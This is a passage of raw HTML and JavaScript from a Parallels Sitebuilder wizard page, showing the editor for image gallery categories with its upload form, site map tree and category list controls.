<table style="width: 102px; height: 70px; background-color: #A4A4A4;"><tr><td valign="middle" align="center"><span style="vertical-align: middle; color: #FFFFFF;"><b>No image</b></span></td></tr></table>
<input type="hidden" name="image" value="">
</td>
<td></td>
<td></td>
</tr>
<tr>
<td class="title-block"><label class="name">New image</label></td>
<td class="input-block"><input type="file" size="25" maxlength="255" class="sb-input" name="image"></td>
<td style="padding-left:5px;"><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;" class="" id="" onclick='setWizardFormAction("/Wizard/Edit/Modules/ImageGallery/Category/Image/Upload");wizardFormSubmit();'><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="MainText">Upload</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table></td>
<td style="padding-left:5px;"></td>
</tr>
</table>
</div>
<div style="display:none;" id="descriptionContent">
<label class="name"></label><script type="text/javascript" src="/wysiwyg/fckeditor.js?5.0.0.2009110318"></script><script language="JavaScript" type="text/javascript">
           function Init_Wysiwyg_description() {
               if (!Wysiwyg_description) {
                   Wysiwyg_description = new FCKeditor('Wysiwyg_description', '100%', '');
                   Wysiwyg_description.BasePath = '/wysiwyg//';
                   Wysiwyg_description.Config["CustomConfigurationsPath"] = Wysiwyg_description.BasePath + "/custom/config/modules/default.js?5.0.0.2009110318";
                   Wysiwyg_description.Config["SkinPath"] = Wysiwyg_description.BasePath + 'editor/skins/silver/';
                   Wysiwyg_description.ToolbarSet = "module";
                   
                   Wysiwyg_description.Config["LinkUpload"] = false;
                   Wysiwyg_description.Config["LinkBrowser"] = false;
                   Wysiwyg_description.Config["ImageBrowser"] = false;
                   
                   Wysiwyg_description.Config["ImageUploadURL"] = '/Wizard/Edit/Wysiwyg/ImageUpload';
                   
                   Wysiwyg_description.Config["SmileyPath"] = '/images/modules/smiley/';
                   
                   Wysiwyg_description.Config["AutoDetectLanguage"] = false;
                   Wysiwyg_description.Config["DefaultLanguage"]="en";
                   Wysiwyg_description.Config["Version"]="5.0.0.2009110318";
                   Wysiwyg_description.ReplaceTextarea();
               }
           }
           var Wysiwyg_description=null;
           
               RegisterOnloadAction('sb_panel_1.registerPageOnloadAction("description","Init_Wysiwyg_description();");');
           </script><textarea id="Wysiwyg_description" name="description" style="border-width: 0px; height: 100%;">This is the category1 description.</textarea><script type="text/javascript">
               SbAppendLocaleKey('uploadImageToServer', 'Please upload the image to the server.');
           
               SbAppendLocaleKey('invalidFileType', 'Invalid file type.');
           
               SbAppendLocaleKey('selectFile', 'Please select a file to upload.');
           </script>
</div>
</td></tr>
<tr class="sb-formtablefooter"><th style="width: 100%;">..</th></tr>
</table>
<script type="text/javascript">imgPath='/skins/WinXPReloadedCompact/images/';</script><script type="text/javascript" src="/js/tabpanel.js?5.0.0.2009110318"></script><script type="text/javascript">sb_panel_1 = new TabPanel();
           sb_panel_1.setupAllPages();
       </script><table cellpadding="0" cellspacing="0" border="0" style="width: 100%;"><tr><td style="padding: 0 10px;"><table cellpadding="0" cellspacing="0" class="form-tools-container"><tr><td><table cellpadding="0" cellspacing="0" class="ok-cancel-container"><tr>
<td><table cellspacing="0" cellpadding="0" border="0" style="cursor: pointer; width: 90px;" onclick="if (validateCategory()){wizardFormSubmit();}"><tr>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_ok_left.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_ok_middle.gif); background-repeat:repeat-x; width: 1px; padding-left: 5px;"><img src="/skins/WinXPReloadedCompact/icons/ok.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_ok_middle.gif);" align="center" class="sb-button-ok">OK</td>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_ok_right.gif"></td>
</tr></table></td>
<td class="cancel-area"><table onclick="document.location.href='/Wizard/Edit/Modules/ImageGallery?tab=categories';" style="cursor: pointer; width: 90px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); background-repeat:repeat-x; width: 1px; padding-left: 5px;"><img src="/skins/WinXPReloadedCompact/icons/cancel.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif);" align="center" class="sb-button-cancel">Cancel</td>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></td></tr></table></td></tr></table>
</td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('modalForm');
       </script><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%">
<tr id="TRHeader"><td COLSPAN="2">
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-top-container"><tr><td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;" class="sb-header-top"><tr>
<td width="100%"><div style="width: 205px; text-align: center;"><img align="middle" style="cursor: pointer;" alt="" border="0" src="/skins/WinXPReloadedCompact/images/def_sb_logo.gif?5.0.0.2009110318" onclick="window.open('http://www.parallels.com', '_new'); return false;"></div></td>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;border-collapse:collapse;"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Start');" style="cursor: pointer;"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_left.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_start_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Start</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Design');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_design_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Design</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Pages');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_pages_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Pages</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_al.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_edit_abullet.gif"></td>
<td class="sb-steps-text-active" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);">Edit</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_ar.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Publish');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_publish_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Publish</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_right.gif"></td>
</tr></table></td>
</tr></table></td>
<td align="right" class="sb-header-company-logo"><img style="cursor: pointer" onclick="window.open('http://www.parallels.com', '_new'); return false;" border="0" src="/skins/WinXPReloadedCompact/images/def_parallels_logo_wizard.gif"></td>
</tr></table></td></tr></table>
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-bottom"><tr>
<td style="padding-left: 10px;">
<table cellpadding="0" cellspacing="0" border="0" style="
                       filter:alpha(opacity=40); opacity: 0.4;
                       " class="" id="saveChangesButton" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/button_middle.gif);padding-left:5px;padding-right:5px;" class=""><img src="/skins/WinXPReloadedCompact/icons/save_icon.gif"></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="saveChangesButtonMainText">Save Changes</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<script type="text/javascript">
                           sbApplyChangesObject.addListener(enableSaveChangesButton);
                       </script>
</td>
<td style="padding-left: 10px; width: 100%;" onclick="sb_status.showDetails();" id="StatusBar">
<table cellpadding="0" cellspacing="3" width="100%" border="0" style="display:inline-block;width:100%;"><tr>
<td valign="middle"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/icon_help.gif"></td>
<td valign="middle" width="100%" style="padding-left: 10px;"><div id="StatusMessage" class="sb-statusbar-text">Create and edit the content of your web site.</div></td>
</tr></table>
<script type="text/javascript" language="javascript" src="/js/Wizard/Status.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
                       sb_status = new SB_Status('/skins/WinXPReloadedCompact');
                       </script>
</td>
<td class="sb-header-bottom-right"><table cellspacing="0" cellpadding="0" border="0" style="height: 100%;"><tr><td><a style="text-decoration: none" onclick="javascript:try{window.open('http://download1.parallels.com/PPSMBE/10.0.0/Doc/help.htm?locale=en-US&amp;article=/Wizard/Edit/Modules/ImageGallery/Category/Edit&amp;help_type=user','_blank')}catch(e){}; void(0);" href="#"><table cellpadding="0" cellspacing="0" border="0" type="button" style="height:100%;"><tr>
<td style="padding: 5px;"><img style="border-width:0px;" width="16" height="16" src="/skins/WinXPReloadedCompact/icons/help.png"></td>
<td class="sb-tools-text" style="padding-right:10px;">Help</td>
</tr></table></a></td></tr></table></td>
</tr></table>
</td></tr>
<tr><td class="sb-wizard-layout-content">
<script type="text/javascript" src="/js/Wizard/panel_toogle.js?5.0.0.2009110318"></script><table border="0" cellpadding="0" cellspacing="0" style="height: 100%;width:100%" align="center"><tr><td style="vertical-align: top; " align="center"><table cellpadding="0" cellspacing="0" border="0" style="height: 100%;width:100%"><tr>
<td valign="top">
<input type="hidden" id="LeftPanelDiv_hidden" value="false"><input type="hidden" id="LeftPanelDiv_show_action" value="localeCode=en_US&amp;section=Wizard_Edit&amp;key=showSiteMap"><input type="hidden" id="LeftPanelDiv_hide_action" value="localeCode=en_US&amp;section=Wizard_Edit&amp;key=hideSiteMap"><table style="height:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-edit-panel"><tr>
<td><div id="LeftPanelDiv" style="height: 100%; display: block;"><table width="200" cellspacing="8" cellpadding="8" border="0">
<tr valign="top" height="1"><td><b class="sb-text">Site map</b></td></tr>
<tr class="sb-edit-panel-block"><td class="sb-edit-panel-block-border" id="siteMapTd" valign="top" height="1">
<script src="/js/Wizard/Edit.js?5.0.0.2009110318" language="javascript"></script><script type="text/javascript" language="javascript"><!--
                                           var currentPageId = '1iqsyi3rp1o';
                                           var action = '/Wizard/Edit';
                                           Event.observe(window, 'load', siteMapOnResize);
                                           Event.observe(window, 'resize', siteMapOnResize);
                                           //--></script><table border="0" cellpadding="0" cellspacing="0" width="100%" height="100%" style="table-layout: fixed;"><tr><td valign="top">
<script type="text/javascript" language="javascript" src="/js/pages_tree.js?5.0.0.2009110318"></script><div id="edit" style="white-space: nowrap; overflow-x: hidden; overflow-y: auto; width:100%; height:100%;">
<script type="text/javascript" language="javascript"><!--
                   SbInitTree('edit', 'true', 'true', '', '', 'true', onNodeSelect, null, null, null);
                   var tree = document.getElementById('edit');
                   
               //--></script><div id="q485ez4jvyq" valign="middle">
<img id="q485ez4jvyqState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="q485ez4jvyqLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="q485ez4jvyqCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="q485ez4jvyqIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="q485ez4jvyqSpan" style="vertical-align: middle;">Home</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'q485ez4jvyq', 'page1.php', 'Simple', '', '', 'visible');
       </script><div id="hwal3pvmvz3" valign="middle">
<img id="hwal3pvmvz3State" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="hwal3pvmvz3Line" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="hwal3pvmvz3Check" type="checkbox" style="display: inline; vertical-align: middle;"><img id="hwal3pvmvz3Icon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="hwal3pvmvz3Span" style="vertical-align: middle;">About Me</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'hwal3pvmvz3', 'page2.php', 'Simple', '', '', 'visible');
       </script><div id="b1ynn2c224e" valign="middle">
<img id="b1ynn2c224eState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="b1ynn2c224eLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="b1ynn2c224eCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="b1ynn2c224eIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="b1ynn2c224eSpan" style="vertical-align: middle;">My Family</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'b1ynn2c224e', 'page3.php', 'Simple', '', '', 'visible');
       </script><div id="1iqsyi3rp1o" valign="middle">
<img id="1iqsyi3rp1oState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="1iqsyi3rp1oLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="1iqsyi3rp1oCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="1iqsyi3rp1oIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/modules/ImageGallery/images/icon.gif"><span id="1iqsyi3rp1oSpan" style="vertical-align: middle;">Photos</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', '1iqsyi3rp1o', 'page4.php', 'ImageGallery', 'true', '', 'visible');
       </script><div id="1mhpsivotpo" valign="middle">
<img id="1mhpsivotpoState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="1mhpsivotpoLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="1mhpsivotpoCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="1mhpsivotpoIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="1mhpsivotpoSpan" style="vertical-align: middle;">Resume</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', '1mhpsivotpo', 'page5.php', 'Simple', '', '', 'visible');
       </script><div id="q05ufw2vwxb" valign="middle">
<img id="q05ufw2vwxbState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="q05ufw2vwxbLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="q05ufw2vwxbCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="q05ufw2vwxbIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="q05ufw2vwxbSpan" style="vertical-align: middle;">Favorite Links</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'q05ufw2vwxb', 'page6.php', 'Simple', '', '', 'visible');
       </script><div id="pp2btyiv601" valign="middle">
<img id="pp2btyiv601State" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="pp2btyiv601Line" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="pp2btyiv601Check" type="checkbox" style="display: inline; vertical-align: middle;"><img id="pp2btyiv601Icon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="pp2btyiv601Span" style="vertical-align: middle;">Contact Me</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'pp2btyiv601', 'page7.php', 'Simple', '', '', 'visible');
       </script>
</div>
<script type="text/javascript" language="javascript"><!--
               SbRefreshTree('edit');
           //--></script>
</td></tr></table>
<script type="text/javascript" language="javascript">
                           var knownPagesFileNames = new Array('index');
                           knownPagesFileNames.push('page1');

       registerPageEditView('q485ez4jvyq', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page2');

       registerPageEditView('hwal3pvmvz3', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page3');

       registerPageEditView('b1ynn2c224e', '/Wizard/Edit/Html');
       

       registerPageEditView('1iqsyi3rp1o', '/Wizard/Edit/Modules/ImageGallery');
       knownPagesFileNames.push('page5');

       registerPageEditView('1mhpsivotpo', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page6');

       registerPageEditView('q05ufw2vwxb', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page7');

       registerPageEditView('pp2btyiv601', '/Wizard/Edit/Html');
       </script>
</td></tr>
<tr class="sb-edit-panel-block"><td class="sb-edit-panel-block-border" id="pageInfoTd" valign="top" height="1">
<script>
           sbNavigationObject.registerOnSubmitFunction(validateForm);
       </script><table height="160px" width="100%" border="0" cellpadding="0" cellspacing="0" style="table-layout: fixed;">
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page title</span><span style="color:Red; width: 10px;">*</span><br><input id="pageTitle" name="pageTitle" type="text" maxlength="255" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();" value="Photos">
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page file name</span><span style="color:Red; width: 10px;">*</span><br><input id="pageFileName" name="pageFileName" type="text" maxlength="255" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:140px;" onchange="self.sbApplyChangesObject.registerChange();" value="page4"><span class="sb-text">.php</span>
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page keywords</span><br><textarea id="pageKeywords" name="pageKeywords" rows="2" cols="20" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();"></textarea>
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page description</span><br><textarea id="pageDescription" name="pageDescription" rows="2" cols="20" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();"></textarea>
</td></tr>
<tr><td>
<span style="color:Red; padding-right: 5px;">*</span><span class="sb-text">Required fields</span><br>
</td></tr>
<tr><td style="height: 20px;"><img width="100%" height="1" src="/skins/WinXPReloadedCompact/images/line.gif"></td></tr>
<tr><td><table cellpadding="0" cellspacing="0" border="0" class="control-input-title"><tr>
<td class="input-block"><input id="pageShowInNavigation" type="checkbox" name="pageShowInNavigation" onchange="self.sbApplyChangesObject.registerChange();" class="sb-check" checked></td>
<td class="title-block"><label class="name" for="pageShowInNavigation">Show this page in site map</label></td>
</tr></table></td></tr>
<tr><td align="center" style="padding-top: 10px">
<table cellpadding="0" cellspacing="0" border="0" style="
                       filter:alpha(opacity=40); opacity: 0.4;
                       width: 100%" class="" id="plainPageButton" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="sb-button-disabled" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="plainPageButtonMainText">Remove Design Template</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<input type="hidden" id="isPlainPage" name="isPlainPage" value="0">
</td></tr>
</table>
<input type="hidden" name="currentPageId" id="page" value="1iqsyi3rp1o">
</td></tr>
</table></div></td>
<td style="height: 100%;" class="sb-edit-panel-hidebackground" id="LeftPanelDiv_Bar"><div id="ButtonHideTree" onclick="toggleLeftPanel('/skins/WinXPReloadedCompact/images/right.gif', '/skins/WinXPReloadedCompact/images/left.gif');" align="center" style="width: 21px; height: 100%; border: 0px solid #7D7D7D; float: left; cursor: hand; cursor: pointer;">
<img id="LeftPanelDiv_bullet" class="sb-edit-panel-arrow" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/left.gif"><br><img id="LeftPanelDiv_Text" style="border-width:0px;" src="/localizedimage.php?localeCode=en_US&amp;section=Wizard_Edit&amp;key=hideSiteMap">
</div></td>
</tr></table>
</td>
<td valign="top" style="width: 100%; height: 100%">
<div class="sb-edit-modulename">
<img style="border-width:0px;" src="/modules/ImageGallery/images/icon.gif"><span class="sb-page-title" style="padding-left: 9px;">Image Gallery</span>
</div>
<table class="sb-formtable" cellspacing="0" border="0" style="border-collapse:collapse;height: 99%; width: 100%;"><tr><td valign="top">
<input type="hidden" name="tab" value="image_upload"><input type="hidden" name="pageNum" value=""><input type="hidden" name="pageSize" value=""><input type="hidden" name="orderBy" value=""><input type="hidden" name="orderType" value=""><input type="hidden" name="viewAction" id="viewAction" value="/Wizard/Edit"><table class="sb-formtable" cellpadding="0" cellspacing="0" width="100%" border="0">
<tr class="sb-formtableheader"><th valign="bottom" align="left" class="sb-formtableheader-th" style="width: 100%;"><table style="width:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-formtable"><tr><td valign="top" style="width:100%;"><table border="0" cellspacing="0" cellpadding="0"><tr>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:pointer;width:10px;height: 21px;" class="TabLabelDefaultStyle" id="image_management" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOff.gif" alt="" id="image_management_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOff.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="image_management_T">Images</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOff.gif" id="image_management_IR" alt=""></td>
</tr></table></td>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:default;width:10px; height: 21px;" class="TabLabelSelectedStyle" id="categories" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOn.gif" alt="" id="categories_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOn.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="categories_T">Categories</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOn.gif" id="categories_IR" alt=""></td>
</tr></table></td>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:pointer;width:10px;height: 21px;" class="TabLabelDefaultStyle" id="settings" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOff.gif" alt="" id="settings_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOff.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="settings_T">Settings</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOff.gif" id="settings_IR" alt=""></td>
</tr></table></td>
</tr></table></td></tr></table></th></tr>
<tr><td style="padding: 10px;" class="sb-page">
<div style="display:none;" id="image_managementContent"></div>
<div style="display:block;" id="categoriesContent">
<script src="/modules/ImageGallery/js/categories.js?5.0.0.2009110318" type="text/javascript"></script><fieldset>
<legend>Tools</legend>
<div class="fieldset-block"><table cellspacing="0" border="0" style="border-collapse:collapse;"><tr><td valign="top"><table cellpadding="0" cellspacing="0" border="0" class="sb-button-tool-table" onclick='javascript: sbApplyChangesObject.registerForcedSaving();sbNavigationObject.go("/Wizard/Edit/Modules/ImageGallery/Category/Add");' style="cursor: pointer; width: 80px;">
<tr>
<td rowspan="2" style="width:0;"></td>
<td align="center" valign="middle"><img border="0" alt="" src="/skins/WinXPReloadedCompact/icons/category.png"></td>
</tr>
<tr><td align="center" class="sb-button-tool-text">Add New Category</td></tr>
</table></td></tr></table></div>
</fieldset>
<script type="text/javascript" src="/js/list.js?5.0.0.2009110318"></script><script language="javascript">
function pagedListDoSort(tab, orderBy, orderType) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.action = '/Wizard/Edit/Modules/ImageGallery/Category/Edit';
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.orderBy.value = orderBy;
   form.orderType.value = orderType;
   form.submit();
}
</script><fieldset>
<legend>Categories</legend>
<div class="fieldset-block">
<div class="list-tool-block"><table cellspacing="0" cellpadding="0" border="0" class="link-button-container"><tr>
<td class="link-button-image-area"><a href="#" onclick="deleteCategories()"><img border="0" alt="" src="/skins/WinXPReloadedCompact/icons/delete.png"></a></td>
<td class="link-button-text-area"><a href="#" style="color: Black;" onclick="deleteCategories()">Remove Selected</a></td>
</tr></table></div>
<div class="clear"></div>
<table cellpadding="0" cellspacing="0" border="0"><tr>
<td></td>
<td>
<script language="javascript">
function pagedListShowAll(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.action = '/Wizard/Edit/Modules/ImageGallery/Category/Edit';

   if (form.filterValue) {
       form.filterValue.selectedIndex = 0;
   }
   form.elements[tab+'searchString'].value='';
   form.submit();
}
function pagedListSearchItems(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.action = '/Wizard/Edit/Modules/ImageGallery/Category/Edit';

   form.submit();
}
function pagedListChangeFilter(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.action = '/Wizard/Edit/Modules/ImageGallery/Category/Edit';

   form.submit();
}
</script><table cellpadding="0" cellspacing="0" border="0" class="list-show-container"><tr>
<td class="list-show-search-input-area"><input type="text" size="25" maxlength="255" class="sb-input" name="categoriessearchString"></td>
<td class="list-show-search-tool-area"><table cellpadding="0" cellspacing="0" border="0" type="button" style="cursor:pointer;" class="link-button-container" onclick="pagedListSearchItems('categories');"><tr>
<td class="link-button-image-area"><img src="/skins/WinXPReloadedCompact/icons/search.png" alt=""></td>
<td class="link-button-text-area"><span style="text-decoration: underline;">Search</span></td>
</tr></table></td>
<td class="list-show-showall-tool-area"><table cellpadding="0" cellspacing="0" border="0" type="button" name="ImageButtonShowAll" style="cursor:pointer;" class="link-button-container" onclick="pagedListShowAll('categories');"><tr>
<td class="link-button-image-area"><img src="/skins/WinXPReloadedCompact/icons/showall.png" alt=""></td>
<td class="link-button-text-area"><span style="text-decoration: underline;">Show All</span></td>
</tr></table></td>
</tr></table>
</td>
</tr></table>
<script language="javascript">
function pagedListGotoPage(tab, pageNum) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = pageNum;
   form.submit();
}
function pagedListSetPageSize(tab, pageSize) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.pageSize.value = pageSize;
   form.submit();
}
</script><table width="100%" cellspacing="0" cellpadding="0" border="0" class="list-pager-container"><tr>
<td class="list-pager-total-area">2..records total</td>
<td class="list-pager-go-area"></td>
<td class="list-pager-numbers-area">Number of entries per page:..
       <a href="javascript:pagedListSetPageSize('categories',5);">5</a>..
       <strong>10</strong>..
       <a href="javascript:pagedListSetPageSize('categories',25);">25</a>..
       <a href="javascript:pagedListSetPageSize('categories',100);">100</a>
</td>
</tr></table>
<div class="scroll-table"><table cellspacing="0" cellpadding="0" border="0" class="list-table">
<tr class="fixed">
<th style="width:1%;"><div><input type="checkbox" name="globalCheck" onclick="setCheckboxStatus(this.checked);" class="check"></div></th>
<th style="width:1%;"><div>P</div></th>
<th><div>Name</div></th>
<th><div>Number of images</div></th>
<th style="width:1%;"><div><span></span></div></th>
